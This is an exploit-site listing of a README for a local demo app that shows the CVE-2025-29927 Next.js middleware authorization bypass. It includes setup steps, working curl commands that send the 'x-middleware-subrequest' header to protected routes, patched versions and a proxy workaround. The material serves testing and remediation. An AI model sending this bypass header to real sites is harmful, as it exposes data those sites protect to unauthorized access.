Exploit for CVE-2025-29927

Name: Exploit for CVE-2025-29927
Rating: 5 (122 reviews)
2025-03-25 | CVSS 9.1
## https://sploitus.com/exploit?id=1058C2EE-ADF1-5B2E-8418-BFCD36AA2ED9
# Next.js Middleware Vulnerability Tester (CVE-2025-29927)

This application demonstrates the Next.js middleware authorization bypass vulnerability (CVE-2025-29927).

## About The Vulnerability

CVE-2025-29927 is an authorization bypass vulnerability in Next.js middleware. By sending a specially crafted HTTP header (`x-middleware-subrequest`), an attacker can bypass authorization checks implemented in the middleware, potentially gaining access to protected resources.

## Setup Instructions

1. Install dependencies:
   ```
   cd /var/www/react-nextjs/test-middleware-skip
   npm install
   ```

2. Run the development server:
   ```
   npm run dev
   ```

3. The server will start on http://localhost:3000

## Testing the Vulnerability

### Normal Access (Should be Blocked)

Try accessing the protected route normally:
```
npm run test-normal
```
or
```
curl -v http://localhost:3000/protected-data
```

You should receive a 401 Unauthorized response, as the middleware blocks access.

### Exploiting the Vulnerability

Try accessing the protected route with the exploit header:
```
npm run test-exploit
```
or
```
curl -v -H "x-middleware-subrequest: middleware" http://localhost:3000/protected-data
```

If the application is vulnerable, you'll receive a 200 OK response with the protected data.

### Testing the API Route

Normal access (should be blocked):
```
curl -v http://localhost:3000/api/protected
```

With exploit:
```
curl -v -H "x-middleware-subrequest: middleware" http://localhost:3000/api/protected
```

## Remediation

To fix this vulnerability, you should:

1. Update Next.js to a patched version:
   - Next.js 15.x: Update to 15.2.3 or later
   - Next.js 14.x: Update to 14.2.25 or later
   - Next.js 13.x: Update to 13.5.9 or later
   - Next.js 12.x: Update to 12.3.5 or later

2. If you cannot update, implement a reverse proxy (like Nginx or Cloudflare) that strips the `x-middleware-subrequest` header from incoming requests.

## Additional Test Commands

Test if the API route is vulnerable:
```
# Normal request (should be blocked)
curl -v http://localhost:3000/api/protected

# With exploit header
curl -v -H "x-middleware-subrequest: middleware" http://localhost:3000/api/protected
```

## Disclaimer

This tool is provided for educational and security testing purposes only. Use it to verify if your own Next.js applications are vulnerable and need patching.